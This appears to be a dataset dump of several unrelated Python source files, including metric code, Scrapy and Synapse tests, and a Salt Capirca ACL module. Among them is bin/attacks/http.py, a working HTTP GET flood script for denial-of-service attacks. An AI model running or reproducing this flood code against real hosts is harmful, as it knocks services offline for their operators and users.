] | 306 | 2020-02-06T18:08:43.000Z | 2022-03-25T14:50:18.000Z | src/mbed_tools/sterm/__init__.py | cyliangtw/mbed-tools | 69c600c0a5ac1eb0d52b481b5ba020da8bb73d33 | [
"Apache-2.0"
] | 23 | 2020-03-17T11:42:23.000Z | 2022-01-30T02:56:18.000Z | #
# Copyright (c) 2020-2021 Arm Limited and Contributors. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
"""Package containing sterm functionality."""
| 27.5 | 76 | 0.751515 |
4a25a7f3a81c5d9e118d139427e3b5dc5ba1f135 | 2,567 | py | Python | app/metric/aggregator.py | IvanoBilenchi/umlens | 7d0c621038209567ad6b8df5e6f14f413d417f22 | [
"MIT"
] | null | null | null | app/metric/aggregator.py | IvanoBilenchi/umlens | 7d0c621038209567ad6b8df5e6f14f413d417f22 | [
"MIT"
] | null | null | null | app/metric/aggregator.py | IvanoBilenchi/umlens | 7d0c621038209567ad6b8df5e6f14f413d417f22 | [
"MIT"
] | 1 | 2020-12-01T10:49:03.000Z | 2020-12-01T10:49:03.000Z | from typing import Dict, List, Optional, Type
from app.cycle.finder import CycleFinder
from app.pattern.finder import PatternFinder
from app.uml.model import Diagram
from app.util.decorators import memoized
from .model import (
AvgInheritanceDepth, AvgMethodsPerClass, AvgRelationshipsPerClass, Classes, ClassesInCycle,
ClassesInCycleRatio, ClassesInPattern, ClassesInPatternRatio, ComputedMetric, DependencyCycles,
DevelopmentCost, MethodInstances, Metric, Packages, PatternTypes, RelationshipInstances,
RemediationCost, TechnicalDebtRatio
)
class MetricAggregator:
def __init__(self, diagram: Diagram, cycle_finder: CycleFinder, pattern_finder: PatternFinder,
config: Optional[Dict] = None):
self._diag = diagram
self._cfinder = cycle_finder
self._pfinder = pattern_finder
self._config = config
def compute_metrics(self) -> List[Metric]:
metrics = self._base_metrics().copy()
metrics.append(self._development_cost())
metrics.append(self._remediation_cost())
metrics.append(self._technical_debt_ratio())
return metrics
@memoized
def _computed_metric(self, mtype: Type[ComputedMetric]) -> ComputedMetric:
return mtype(self._diag, self._cfinder, self._pfinder)
@memoized
def _base_metrics(self) -> List[Metric]:
metrics = [self._computed_metric(mtype)
for mtype in (Packages, Classes, PatternTypes, ClassesInPattern,
MethodInstances, RelationshipInstances, AvgInheritanceDepth,
DependencyCycles, ClassesInCycle)]
for mtype, num, den in (
(ClassesInPatternRatio, ClassesInPattern, Classes),
(AvgMethodsPerClass, MethodInstances, Classes),
(AvgRelationshipsPerClass, RelationshipInstances, Classes),
(ClassesInCycleRatio, ClassesInCycle, Classes)
):
metrics.append(mtype(self._computed_metric(num), self._computed_metric(den)))
return metrics
def _remediation_cost(self) -> RemediationCost:
return RemediationCost([(m, self._config[m.identifier])
for m in self._base_metrics() if m.identifier in self._config])
def _development_cost(self) -> DevelopmentCost:
return DevelopmentCost(self._config.get(DevelopmentCost.id(), 0.0))
def _technical_debt_ratio(self) -> TechnicalDebtRatio:
return TechnicalDebtRatio(self._remediation_cost(), self._development_cost())
| 42.081967 | 99 | 0.691858 |
4a25a96badd47db09f10e307b6c2c119edb9be64 | 627 | py | Python | virtual/lib/python3.8/site-packages/pyuploadcare/__init__.py | Carolwanzuu/The_Awwward | 37e4a49bd15e5db320d1940aac346fd1bb939113 | [
"MIT"
] | 1 | 2021-01-31T09:33:34.000Z | 2021-01-31T09:33:34.000Z | virtual/lib/python3.8/site-packages/pyuploadcare/__init__.py | AokoMercyline/E-commerce | 833ad9fd5777e35146dfccf809e78e3c94d997a8 | [
"MIT"
] | 8 | 2021-03-19T11:24:02.000Z | 2022-03-12T00:34:31.000Z | virtual/lib/python3.8/site-packages/pyuploadcare/__init__.py | AokoMercyline/E-commerce | 833ad9fd5777e35146dfccf809e78e3c94d997a8 | [
"MIT"
] | 1 | 2020-11-04T08:35:12.000Z | 2020-11-04T08:35:12.000Z | # coding: utf-8
"""
PyUploadcare: a Python library for Uploadcare
Usage example::
>>> import pyuploadcare
>>> pyuploadcare.conf.pub_key = 'demopublickey'
>>> pyuploadcare.conf.secret = 'demoprivatekey'
>>> file_ = pyuploadcare.File('6c5e9526-b0fe-4739-8975-72e8d5ee6342')
>>> file_.cdn_url
https://ucarecdn.com/6c5e9526-b0fe-4739-8975-72e8d5ee6342/
"""
from __future__ import unicode_literals
__version__ = '2.7.0'
from .api_resources import File, FileList, FileGroup
from .exceptions import (
UploadcareException, APIConnectionError, AuthenticationError, APIError,
InvalidRequestError,
)
| 25.08 | 75 | 0.735247 |
4a25aaac8f4e4abe457ee339dc3fe684590eaf30 | 809 | py | Python | xepacrawler/xepacrawler/pipelines.py | jpchagas/xepa-crawler | 9f80418a1a8e1d21fdf00e2cf3fc5c6ac9e40d9b | [
"Apache-2.0"
] | null | null | null | xepacrawler/xepacrawler/pipelines.py | jpchagas/xepa-crawler | 9f80418a1a8e1d21fdf00e2cf3fc5c6ac9e40d9b | [
"Apache-2.0"
] | null | null | null | xepacrawler/xepacrawler/pipelines.py | jpchagas/xepa-crawler | 9f80418a1a8e1d21fdf00e2cf3fc5c6ac9e40d9b | [
"Apache-2.0"
] | null | null | null | import requests
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
class XepacrawlerPipeline:
def process_item(self, item, spider):
payload = {'release_date':item['data'][0],
'product':item['produto'][0],
'unit':item['unidade'][0],
'max_value':item['maximo'][0],
'frequent_value':item['frequente'][0],
'min_value':item['minimo'][0]}
requests.post('https://xepa.herokuapp.com/price', json=payload)
#requests.post('http://127.0.0.1:5000/price', json=payload)
return item
| 36.772727 | 71 | 0.599506 |
4a25aae7da9d1c933474ab73cc88f48e84bb2b08 | 17,761 | py | Python | synapse/tests/test_lib_node.py | kcreyts/synapse | fe740fd1e0febfa32f8d431b32ab48f8a0cf306e | [
"Apache-2.0"
] | 1 | 2021-02-15T22:07:05.000Z | 2021-02-15T22:07:05.000Z | synapse/tests/test_lib_node.py | kcreyts/synapse | fe740fd1e0febfa32f8d431b32ab48f8a0cf306e | [
"Apache-2.0"
] | null | null | null | synapse/tests/test_lib_node.py | kcreyts/synapse | fe740fd1e0febfa32f8d431b32ab48f8a0cf306e | [
"Apache-2.0"
] | null | null | null | import collections
import synapse.exc as s_exc
import synapse.common as s_common
import synapse.lib.node as s_node
import synapse.tests.utils as s_t_utils
from synapse.tests.utils import alist
class NodeTest(s_t_utils.SynTest):
async def test_pack(self):
form = 'test:str'
valu = 'cool'
props = {'tick': 12345}
async with self.getTestCore() as core:
await core.addTagProp('score', ('int', {}), {})
await core.addTagProp('note', ('str', {'lower': True, 'strip': 'True'}), {})
async with await core.snap() as snap:
node = await snap.addNode(form, valu, props=props)
await node.setTagProp('foo', 'score', 10)
await node.setTagProp('foo', 'note', " This is a really cool tag! ")
iden, info = node.pack()
self.eq(iden, ('test:str', 'cool'))
self.eq(info.get('tags'), {'foo': (None, None)})
self.eq(info.get('tagprops'), {'foo': {'score': 10, 'note': 'this is a really cool tag!'}})
props = {k: v for (k, v) in info.get('props', {}).items() if not k.startswith('.')}
self.eq(props, {'tick': 12345})
iden, info = node.pack(dorepr=True)
self.eq(iden, ('test:str', 'cool'))
self.eq(info.get('tags'), {'foo': (None, None)})
props = {k: v for (k, v) in info.get('props', {}).items() if not k.startswith('.')}
self.eq(props, {'tick': 12345})
self.eq(info.get('repr'), None)
reprs = {k: v for (k, v) in info.get('reprs', {}).items() if not k.startswith('.')}
self.eq(reprs, {'tick': '1970/01/01 00:00:12.345'})
tagpropreprs = info.get('tagpropreprs')
self.eq(tagpropreprs, {'foo': {'score': '10'}})
# Set a property on the node which is extra model and pack it.
# This situation can be encountered in a multi-layer situation
# where one Cortex can have model knowledge and set props
# that another Cortex (sitting on top of the first one) lifts
# a node which has props the second cortex doens't know about.
node.props['.newp'] = 1
node.props['newp'] = (2, 3)
node.tagprops[('foo', 'valu')] = 10
iden, info = node.pack(dorepr=True)
props, reprs = info.get('props'), info.get('reprs')
tagprops, tagpropreprs = info.get('tagprops'), info.get('tagpropreprs')
self.eq(props.get('.newp'), 1)
self.eq(props.get('newp'), (2, 3))
self.eq(tagprops, {'foo': {'score': 10, 'note': 'this is a really cool tag!', 'valu': 10}})
# without model knowledge it is impossible to repr a value so it should
# *not* be in the repr dict
self.none(reprs.get('newp'))
self.none(reprs.get('.newp'))
self.eq(tagpropreprs, {'foo': {'score': '10'}})
async def test_set(self):
form = 'test:str'
valu = 'cool'
props = {'tick': 12345}
async with self.getTestCore() as core:
async with await core.snap() as snap:
self.true(snap.strict) # Following assertions based on snap.strict being true
node = await snap.addNode(form, valu, props=props)
self.false(await node.set('tick', 12345))
self.true(await node.set('tick', 123456))
await self.asyncraises(s_exc.NoSuchProp, node.set('notreal', 12345))
ronode = await snap.addNode('test:comp', (1, 's'))
await self.asyncraises(s_exc.ReadOnlyProp, ronode.set('hehe', 2))
snap.strict = False
self.false(await ronode.set('hehe', 3))
snap.strict = True
async def test_has(self):
form = 'test:str'
valu = 'cool'
props = {'tick': 12345}
async with self.getTestCore() as core:
async with await core.snap() as snap:
node = await snap.addNode(form, valu, props=props)
self.true(node.has('tick'))
self.true(node.has('.created'))
self.false(node.has('nope'))
self.false(node.has('.nope'))
async def test_get(self):
form = 'test:str'
valu = 'cool'
props = {'tick': 12345}
async with self.getTestCore() as core:
async with await core.snap() as snap:
node = await snap.addNode(form, valu, props=props)
await node.addTag('cool', valu=(1, 2))
self.eq(node.get('tick'), 12345)
self.none(node.get('nope'))
self.eq(node.get('#cool'), (1, 2))
self.none(node.get('#newp'))
async def test_pop(self):
form = 'test:str'
valu = 'cool'
props = {'tick': 12345}
async with self.getTestCore() as core:
async with await core.snap() as snap:
node = await snap.addNode(form, valu, props=props)
await node.addTag('cool', valu=(1, 2))
await self.asyncraises(s_exc.NoSuchProp, node.pop('nope'))
snap.strict = False
self.false(await node.pop('nope'))
snap.strict = True
ronode = await snap.addNode('test:comp', (1, 's'))
await self.asyncraises(s_exc.ReadOnlyProp, ronode.pop('hehe'))
snap.strict = False
self.false(await ronode.pop('hehe'))
snap.strict = True
async def test_repr(self):
async with self.getTestCore() as core:
async with await core.snap() as snap:
form = 'test:str'
valu = 'cool'
props = {'tick': 12345}
node = await snap.addNode(form, valu, props=props)
self.eq('cool', node.repr())
self.eq(node.repr('tick'), '1970/01/01 00:00:12.345')
form = 'test:threetype'
valu = 'cool'
node = await snap.addNode(form, valu)
self.eq(node.repr(), '3')
reprs = {k: v for (k, v) in node.reprs().items() if not k.startswith('.')}
self.eq(reprs.get('three'), '3')
async def test_tags(self):
form = 'test:str'
valu = 'cool'
props = {'tick': 12345}
async with self.getTestCore() as core:
async with await core.snap() as snap:
self.true(snap.strict)
node = await snap.addNode(form, valu, props=props)
# Add a tag
await node.addTag('cool', valu=(1, 2))
self.eq(node.getTag('cool'), (1, 2))
await node.addTag('cool', valu=(1, 2)) # Add again
self.eq(node.getTag('cool'), (1, 2))
await node.addTag('cool', valu=(1, 3)) # Add again with different valu
self.eq(node.getTag('cool'), (1, 3))
await node.addTag('cool', valu=(-5, 0)) # Add again with different valu
self.eq(node.getTag('cool'), (-5, 3)) # merges...
self.true(node.hasTag('cool'))
self.true(node.hasTag('#cool'))
self.false(node.hasTag('notcool'))
self.false(node.hasTag('#notcool'))
# Demonstrate that valu is only applied at the level that addTag is called
await node.addTag('cool.beans.abc', valu=(1, 8))
self.eq(node.getTag('cool.beans.abc'), (1, 8))
self.eq(node.getTag('cool.beans'), (None, None))
await self.asyncraises(s_exc.NoSuchProp, node.pop('nope'))
snap.strict = False
self.false(await node.pop('nope'))
snap.strict = True
async def test_helpers(self):
form = 'test:str'
valu = 'cool'
props = {'tick': 12345,
'hehe': 'hehe',
}
tval = (None, None)
async with self.getTestCore() as core:
await core.addTagProp('score', ('int', {}), {})
await core.addTagProp('note', ('str', {'lower': True, 'strip': 'True'}), {})
async with await core.snap() as snap:
node = await snap.addNode(form, valu, props=props)
await node.addTag('test.foo.bar.duck', tval)
await node.addTag('test.foo.baz', tval)
await node.addTag('test.foo.time', ('2016', '2019'))
await node.addTag('test.foo', ('2015', '2017'))
await node.setTagProp('test', 'score', 0)
await node.setTagProp('test', 'note', 'Words')
pode = node.pack(dorepr=True)
node2 = await snap.addNode('test:int', '1234')
pode2 = node2.pack(dorepr=True)
self.eq(s_node.ndef(pode), ('test:str', 'cool'))
self.eq(s_node.reprNdef(pode), ('test:str', 'cool'))
self.eq(s_node.ndef(pode2), ('test:int', 1234))
self.eq(s_node.reprNdef(pode2), ('test:int', '1234'))
e = 'bf1198c5f28dae61d595434b0788dd6f7206b1e62d06b0798e012685f1abc85d'
self.eq(s_node.iden(pode), e)
self.true(s_node.tagged(pode, 'test'))
self.true(s_node.tagged(pode, '#test.foo.bar'))
self.true(s_node.tagged(pode, 'test.foo.bar.duck'))
self.false(s_node.tagged(pode, 'test.foo.bar.newp'))
self.len(3, s_node.tags(pode, leaf=True))
self.len(5, s_node.tagsnice(pode))
self.len(6, s_node.tags(pode))
self.eq(s_node.reprTag(pode, '#test.foo.bar'), '')
self.eq(s_node.reprTag(pode, '#test.foo.time'), '(2016/01/01 00:00:00.000, 2019/01/01 00:00:00.000)')
self.none(s_node.reprTag(pode, 'test.foo.newp'))
self.eq(s_node.prop(pode, 'hehe'), 'hehe')
self.eq(s_node.prop(pode, 'tick'), 12345)
self.eq(s_node.prop(pode, ':tick'), 12345)
self.eq(s_node.prop(pode, 'test:str:tick'), 12345)
self.none(s_node.prop(pode, 'newp'))
self.eq(s_node.reprProp(pode, 'hehe'), 'hehe')
self.eq(s_node.reprProp(pode, 'tick'), '1970/01/01 00:00:12.345')
self.eq(s_node.reprProp(pode, ':tick'), '1970/01/01 00:00:12.345')
self.eq(s_node.reprProp(pode, 'test:str:tick'), '1970/01/01 00:00:12.345')
self.none(s_node.reprProp(pode, 'newp'))
self.eq(s_node.reprTagProps(pode, 'test'),
[('note', 'words'), ('score', '0')])
self.eq(s_node.reprTagProps(pode, 'newp'), [])
self.eq(s_node.reprTagProps(pode, 'test.foo'), [])
props = s_node.props(pode)
self.isin('.created', props)
self.isin('tick', props)
self.notin('newp', props)
async def test_storm(self):
async with self.getTestCore() as core:
async with await core.snap() as snap:
query = snap.core.getStormQuery('')
with snap.getStormRuntime(query) as runt:
node = await snap.addNode('test:comp', (42, 'lol'))
nodepaths = await alist(node.storm(runt, '-> test:int'))
self.len(1, nodepaths)
self.eq(nodepaths[0][0].ndef, ('test:int', 42))
nodepaths = await alist(node.storm(runt, '-> test:int [:loc=$foo]', opts={'vars': {'foo': 'us'}}))
self.eq(nodepaths[0][0].props.get('loc'), 'us')
path = nodepaths[0][1].fork(node) # type: s_node.Path
path.vars['zed'] = 'ca'
# Path present, opts not present
nodes = await alist(node.storm(runt, '-> test:int [:loc=$zed] $bar=$foo', path=path))
self.eq(nodes[0][0].props.get('loc'), 'ca')
# path is not updated due to frame scope
self.none(path.vars.get('bar'), 'us')
# Path present, opts present but no opts['vars']
nodes = await alist(node.storm(runt, '-> test:int [:loc=$zed] $bar=$foo', opts={}, path=path))
self.eq(nodes[0][0].props.get('loc'), 'ca')
# path is not updated due to frame scope
self.none(path.vars.get('bar'))
# Path present, opts present with vars
nodes = await alist(node.storm(runt, '-> test:int [:loc=$zed] $bar=$baz',
opts={'vars': {'baz': 'ru'}},
path=path))
self.eq(nodes[0][0].props.get('loc'), 'ca')
# path is not updated due to frame scope
self.none(path.vars.get('bar'))
# Path can push / pop vars in frames
self.eq(path.getVar('key'), s_common.novalu)
self.len(0, path.frames)
path.initframe({'key': 'valu'})
self.len(1, path.frames)
self.eq(path.getVar('key'), 'valu')
path.finiframe()
self.len(0, path.frames)
self.eq(path.getVar('key'), s_common.novalu)
# Path can push / pop a runt as well
# This example is *just* a test example to show the variable movement,
# not as actual runtime movement..
path.initframe({'key': 'valu'})
self.eq(path.getVar('key'), 'valu')
path.finiframe()
self.eq(path.getVar('key'), s_common.novalu)
# Path clone() creates a fully independent Path object
pcln = path.clone()
# Ensure that path vars are independent
pcln.setVar('bar', 'us')
self.eq(pcln.getVar('bar'), 'us')
self.eq(path.getVar('bar'), s_common.novalu)
# Ensure the path nodes are independent
self.eq(len(pcln.nodes), len(path.nodes))
pcln.nodes.pop(-1)
self.ne(len(pcln.nodes), len(path.nodes))
# push a frame and clone it - ensure clone mods do not
# modify the original path
path.initframe({'key': 'valu'})
self.len(1, path.frames)
pcln = path.clone()
self.len(1, pcln.frames)
self.eq(path.getVar('key'), 'valu')
self.eq(pcln.getVar('key'), 'valu')
pcln.finiframe()
path.finiframe()
pcln.setVar('bar', 'us')
self.eq(pcln.getVar('bar'), 'us')
self.eq(path.getVar('bar'), s_common.novalu)
self.eq(pcln.getVar('key'), s_common.novalu)
self.eq(path.getVar('key'), s_common.novalu)
# Check that finiframe without frames resets vars
path.finiframe()
self.len(0, path.frames)
self.eq(s_common.novalu, path.getVar('bar'))
# Ensure that path clone() behavior in storm is as expected
# with a real-world style test..
async with self.getTestCore() as core:
await core.nodes('[test:int=1 test:int=2]')
q = '''test:int
$x = $node.value()
for $var in (1, 2) { } // The forloop here is used as a node multiplier
$x = $( $x + 1 )
$lib.fire(test, valu=$node.value(), x=$x)
-test:int'''
msgs = await core.stormlist(q)
data = collections.defaultdict(set)
for m in msgs:
if m[0] == 'storm:fire':
for k, v in m[1].get('data').items():
data[k].add(v)
self.eq(dict(data),
{'valu': {1, 2}, 'x': {2, 3}})
async def test_node_repr(self):
async with self.getTestCore() as core:
nodes = await core.nodes('[ inet:ipv4=1.2.3.4 :loc=us ]')
self.len(1, nodes)
node = nodes[0]
self.eq('1.2.3.4', nodes[0].repr())
self.eq('us', node.repr('loc'))
with self.raises(s_exc.NoSuchProp):
node.repr('newp')
self.none(node.repr('dns:rev'))
async def test_node_data(self):
async with self.getTestCore() as core:
nodes = await core.nodes('[ inet:ipv4=1.2.3.4 :loc=us ]')
self.len(1, nodes)
node = nodes[0]
self.none(await node.getData('foo'))
await node.setData('foo', 123)
self.eq(123, await node.getData('foo'))
await node.setData('foo', 123)
self.eq(123, await node.getData('foo'))
await node.setData('bar', (4, 5, 6))
self.eq((4, 5, 6), await node.getData('bar'))
self.eq(123, await node.getData('foo'))
self.eq([('foo', 123), ('bar', (4, 5, 6))], await alist(node.iterData()))
self.eq(123, await node.popData('foo'))
self.none(await node.getData('foo'))
self.none(await node.popData('foo'))
self.eq((4, 5, 6), await node.getData('bar'))
await node.delete()
nodes = await core.nodes('[ inet:ipv4=1.2.3.4 :loc=us ]')
node = nodes[0]
self.none(await node.getData('foo'))
self.none(await node.getData('bar'))
| 42.592326 | 118 | 0.500084 |
4a25ab120d21b4f40dca2116ee4f958e505340f6 | 1,213 | py | Python | bin/attacks/http.py | R3tr074/Burn-Byte | 6e82aa2d38460ffc299c387a652a1441aef49240 | [
"CC0-1.0"
] | 50 | 2020-10-04T07:25:35.000Z | 2022-02-24T03:52:16.000Z | bin/attacks/http.py | R3tr074/Burn-Byte | 6e82aa2d38460ffc299c387a652a1441aef49240 | [
"CC0-1.0"
] | 4 | 2021-06-08T13:17:18.000Z | 2022-01-13T13:37:37.000Z | bin/attacks/http.py | R3tr074/Burn-Byte | 6e82aa2d38460ffc299c387a652a1441aef49240 | [
"CC0-1.0"
] | 4 | 2020-10-05T02:32:06.000Z | 2021-01-31T23:25:47.000Z | import random
import requests
from rich.console import Console
from bin.addons.utils import random_useragent
# Define styled print
print = Console().print
red = "red3"
green = "green1"
yellow = "yellow1"
# Load user agents
user_agents = []
for _ in range(30):
user_agents.append(random_useragent())
# Headers
headers = {
"X-Requested-With": "XMLHttpRequest",
"Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"Accept-Encoding": "gzip, deflate, br",
"User-agent": random.choice(user_agents),
}
def flood(target):
payload = str(random._urandom(random.randint(10, 150)))
try:
r = requests.get(
f"http://{target[0]}", params=payload, headers=headers, timeout=4
)
except requests.exceptions.ConnectTimeout:
print(f"[{red} bold]✘ ERROR [/{red} bold][{yellow}]Timed out[/{yellow}]")
except Exception as e:
print(
f"[{red} bold]✘ ERROR [/{red} bold] [{yellow}]While sending GET request[/{yellow}]"
)
else:
print(
f"[{green} bold][{r.status_code}][/{green} bold]"
+ f"[{yellow}]Request sent! Payload size: {len(payload)}[/{yellow}]"
)
| 26.369565 | 95 | 0.61418 |
4a25abfefd2253de7451fa0682a7cba285780063 | 2,914 | py | Python | src/networking/auth/exceptions.py | ca1f/mcidle-python | 53f3ce3644f46ee28ea7dc2199ad8ac9d44f1ef5 | [
"MIT"
] | 35 | 2018-12-04T14:54:00.000Z | 2021-12-12T21:09:12.000Z | src/networking/auth/exceptions.py | ca1f/mcidle-python | 53f3ce3644f46ee28ea7dc2199ad8ac9d44f1ef5 | [
"MIT"
] | 7 | 2019-03-05T21:55:28.000Z | 2021-03-07T23:06:50.000Z | src/networking/auth/exceptions.py | ca1f/mcidle-python | 53f3ce3644f46ee28ea7dc2199ad8ac9d44f1ef5 | [
"MIT"
] | 9 | 2019-06-17T03:05:56.000Z | 2020-10-23T10:21:58.000Z | """ Boilerplate from https://github.com/ammaraskar/pyCraft/blob/master/minecraft/exceptions.py """
class YggdrasilError(Exception):
"""
Base `Exception` for the Yggdrasil authentication service.
:param str message: A human-readable string representation of the error.
:param int status_code: Initial value of :attr:`status_code`.
:param str yggdrasil_error: Initial value of :attr:`yggdrasil_error`.
:param str yggdrasil_message: Initial value of :attr:`yggdrasil_message`.
:param str yggdrasil_cause: Initial value of :attr:`yggdrasil_cause`.
"""
def __init__(
self,
message=None,
status_code=None,
yggdrasil_error=None,
yggdrasil_message=None,
yggdrasil_cause=None,
):
super(YggdrasilError, self).__init__(message)
self.status_code = status_code
self.yggdrasil_error = yggdrasil_error
self.yggdrasil_message = yggdrasil_message
self.yggdrasil_cause = yggdrasil_cause
status_code = None
"""`int` or `None`. The associated HTTP status code. May be set."""
yggdrasil_error = None
"""`str` or `None`. The `"error"` field of the Yggdrasil response: a short
description such as `"Method Not Allowed"` or
`"ForbiddenOperationException"`. May be set.
"""
yggdrasil_message = None
"""`str` or `None`. The `"errorMessage"` field of the Yggdrasil response:
a longer description such as `"Invalid credentials. Invalid username or
password."`. May be set.
"""
yggdrasil_cause = None
"""`str` or `None`. The `"cause"` field of the Yggdrasil response: a string
containing additional information about the error. May be set.
"""
class ConnectionFailure(Exception):
"""Raised by 'minecraft.networking.Connection' when a connection attempt
fails.
"""
class VersionMismatch(ConnectionFailure):
"""Raised by 'minecraft.networking.Connection' when connection is not
possible due to a difference between the server's and client's
supported protocol versions.
"""
class LoginDisconnect(ConnectionFailure):
"""Raised by 'minecraft.networking.Connection' when a connection attempt
is terminated by the server sending a Disconnect packet, during login,
with an unknown message format.
"""
class InvalidState(ConnectionFailure):
"""Raised by 'minecraft.networking.Connection' when a connection attempt
fails due to to the internal state of the Connection being unsuitable,
for example if there is an existing ongoing connection.
"""
class IgnorePacket(Exception):
"""This exception may be raised from within a packet handler, such as
`PacketReactor.react' or a packet listener added with
`Connection.register_packet_listener', to stop any subsequent handlers
from being called on that particular packet.
""" | 36.886076 | 98 | 0.697666 |
4a25acb0af0153572842046fa2485721e959b2fc | 43,391 | py | Python | salt/modules/capirca_acl.py | major0/salt | 2019cc89602d296d060e24111df8f9702a8c6bc9 | [
"Apache-2.0"
] | null | null | null | salt/modules/capirca_acl.py | major0/salt | 2019cc89602d296d060e24111df8f9702a8c6bc9 | [
"Apache-2.0"
] | null | null | null | salt/modules/capirca_acl.py | major0/salt | 2019cc89602d296d060e24111df8f9702a8c6bc9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Capirca ACL
============
Generate ACL (firewall) configuration for network devices.
.. versionadded:: 2017.7.0
:codeauthor: Mircea Ulinic <[email protected]> & Robert Ankeny <[email protected]>
:maturity: new
:depends: capirca
:platform: unix
Dependencies
------------
The firewall configuration is generated by Capirca_.
.. _Capirca: https://github.com/google/capirca
Capirca is not yet available on PyPI threrefore it has to be installed
directly form Git: ``pip install -e [email protected]:google/capirca.git#egg=aclgen``.
'''
from __future__ import absolute_import, print_function, unicode_literals
import re
import inspect
import logging
import datetime
log = logging.getLogger(__file__)
# Import third party libs
from salt.ext import six
try:
import aclgen
HAS_CAPIRCA = True
except ImportError:
HAS_CAPIRCA = False
# Import Salt libs
import salt.utils.files
# ------------------------------------------------------------------------------
# module properties
# ------------------------------------------------------------------------------
__virtualname__ = 'capirca'
__proxyenabled__ = ['*']
# allow any proxy type
# ------------------------------------------------------------------------------
# property functions
# ------------------------------------------------------------------------------
def __virtual__():
'''
This module requires at least Capirca to work.
'''
if HAS_CAPIRCA:
return __virtualname__
else:
return (False, 'The capirca module (capirca_acl) cannot be loaded.')
# ------------------------------------------------------------------------------
# module globals
# ------------------------------------------------------------------------------
# define the default values for all possible term fields
# we could also extract them from the `policy` module, inspecting the `Policy`
# class, but that might be overkill & it would make the code less obvious.
# we can revisit this later if necessary.
_TERM_FIELDS = {
'action': [],
'address': [],
'address_exclude': [],
'comment': [],
'counter': None,
'expiration': None,
'destination_address': [],
'destination_address_exclude': [],
'destination_port': [],
'destination_prefix': [],
'forwarding_class': [],
'forwarding_class_except': [],
'logging': [],
'log_name': None,
'loss_priority': None,
'option': [],
'owner': None,
'policer': None,
'port': [],
'precedence': [],
'principals': [],
'protocol': [],
'protocol_except': [],
'qos': None,
'pan_application': [],
'routing_instance': None,
'source_address': [],
'source_address_exclude': [],
'source_port': [],
'source_prefix': [],
'verbatim': [],
'packet_length': None,
'fragment_offset': None,
'hop_limit': None,
'icmp_type': [],
'icmp_code': None,
'ether_type': [],
'traffic_class_count': None,
'traffic_type': [],
'translated': False,
'dscp_set': None,
'dscp_match': [],
'dscp_except': [],
'next_ip': None,
'flexible_match_range': [],
'source_prefix_except': [],
'destination_prefix_except': [],
'vpn': None,
'source_tag': [],
'destination_tag': [],
'source_interface': None,
'destination_interface': None,
'platform': [],
'platform_exclude': [],
'timeout': None,
'flattened': False,
'flattened_addr': None,
'flattened_saddr': None,
'flattened_daddr': None,
'priority': None,
'ttl': None
}
# IP-type fields
# when it comes to IP fields, Capirca does not ingest raw text
# but they need to be converted to `nacaddr.IP`
# this pre-processing is done in `_clean_term_opts`
_IP_FILEDS = [
'source_address',
'source_address_exclude',
'destination_address',
'address',
'address_exclude',
'flattened_addr',
'flattened_saddr',
'flattened_daddr',
'next_ip'
]
_SERVICES = {}
# ------------------------------------------------------------------------------
# helper functions -- will not be exported
# ------------------------------------------------------------------------------
if HAS_CAPIRCA:
class _Policy(aclgen.policy.Policy):
'''
Extending the Capirca Policy class to allow inserting custom filters.
'''
def __init__(self):
self.filters = []
self.filename = ''
class _Term(aclgen.policy.Term):
'''
Extending the Capirca Term class to allow setting field valued on the fly.
'''
def __init__(self):
for field, default in six.iteritems(_TERM_FIELDS):
setattr(self, field, default)
def _import_platform_generator(platform):
'''
Given a specific platform (under the Capirca conventions),
return the generator class.
The generator class is identified looking under the <platform> module
for a class inheriting the `ACLGenerator` class.
'''
log.debug('Using platform: {plat}'.format(plat=platform))
for mod_name, mod_obj in inspect.getmembers(aclgen):
if mod_name == platform and inspect.ismodule(mod_obj):
for plat_obj_name, plat_obj in inspect.getmembers(mod_obj): # pylint: disable=unused-variable
if inspect.isclass(plat_obj) and issubclass(plat_obj, aclgen.aclgenerator.ACLGenerator):
log.debug('Identified Capirca class {cls} for {plat}'.format(
cls=plat_obj,
plat=platform))
return plat_obj
log.error('Unable to identify any Capirca plaform class for {plat}'.format(plat=platform))
def _get_services_mapping():
'''
Build a map of services based on the IANA assignment list:
http://www.iana.org/assignments/port-numbers
It will load the /etc/services file and will build the mapping on the fly,
similar to the Capirca's SERVICES file:
https://github.com/google/capirca/blob/master/def/SERVICES.svc
As this module is be available on Unix systems only,
we'll read the services from /etc/services.
In the worst case, the user will not be able to specify the
services shortcut and they will need to specify the protocol / port combination
using the source_port / destination_port & protocol fields.
'''
if _SERVICES:
return _SERVICES
services_txt = ''
try:
with salt.utils.files.fopen('/etc/services', 'r') as srv_f:
services_txt = salt.utils.stringutils.to_unicode(srv_f.read())
except IOError as ioe:
log.error('Unable to read from /etc/services:')
log.error(ioe)
return _SERVICES # no mapping possible, sorry
# will return the default mapping
service_rgx = re.compile(r'^([a-zA-Z0-9-]+)\s+(\d+)\/(tcp|udp)(.*)$')
for line in services_txt.splitlines():
service_rgx_s = service_rgx.search(line)
if service_rgx_s and len(service_rgx_s.groups()) == 4:
srv_name, port, protocol, _ = service_rgx_s.groups()
if srv_name not in _SERVICES:
_SERVICES[srv_name] = {
'port': [],
'protocol': []
}
try:
_SERVICES[srv_name]['port'].append(int(port))
except ValueError as verr:
log.error(verr)
log.error('Did not read that properly:')
log.error(line)
log.error('Please report the above error: {port} does not seem a valid port value!'.format(port=port))
_SERVICES[srv_name]['protocol'].append(protocol)
return _SERVICES
def _translate_port(port):
'''
Look into services and return the port value using the
service name as lookup value.
'''
services = _get_services_mapping()
if port in services and services[port]['port']:
return services[port]['port'][0]
return port
def _make_it_list(dict_, field_name, value):
'''
Return the object list.
'''
prev_value = []
# firsly we'll collect the prev value
if field_name in dict_:
prev_value = dict_[field_name]
if value is None:
return prev_value
elif isinstance(value, (tuple, list)):
# other type of iterables
if field_name in ('source_port', 'destination_port'):
# port fields are more special
# they can either be a list of integers, either a list of tuples
# list of integers = a list of ports
# list of tuples = a list of ranges,
# e.g.: [(1000, 2000), (3000, 4000)] means the 1000-2000 and 3000-4000 ranges
portval = []
for port in value:
if not isinstance(port, (tuple, list)):
# to make sure everything is consistent,
# we'll transform indivitual ports into tuples
